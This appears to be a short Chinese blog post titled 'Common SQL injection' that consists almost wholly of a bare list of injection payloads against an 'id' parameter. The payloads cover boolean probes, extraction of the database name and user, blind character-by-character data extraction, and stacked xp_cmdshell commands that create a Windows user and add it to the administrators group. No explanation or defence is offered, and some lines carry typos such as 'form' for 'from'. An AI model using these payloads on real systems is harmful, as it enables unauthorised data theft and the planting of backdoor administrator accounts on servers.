id=1 and 1=1 id=1 and 1=2 id=1 and db_name()>0 id=1 and user>0 id=1 and (select count(*) from xx)>0 id=1 and (select cout(xxx) form xx)>0 id=1 and (select top 1 len(xxx) from xx)>0 ->1,2,3...... id=1 and (select top 1 asc(mid(xxx,1,1)) form xx)>0 -> 1-128 id=1;exec master..xp_cmdshell "net user username passwd /add"-- id=1;exec master..xp_cmdshell "net localgroup username administrators /add"-- id=1 and (select top 1 username from sysobjects where xtype=nchar(85) and status>0)>0 id=1 and (select top 1 col_name(object_id('xxx'),1) form sysobjects)>0
常見SQL注入
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.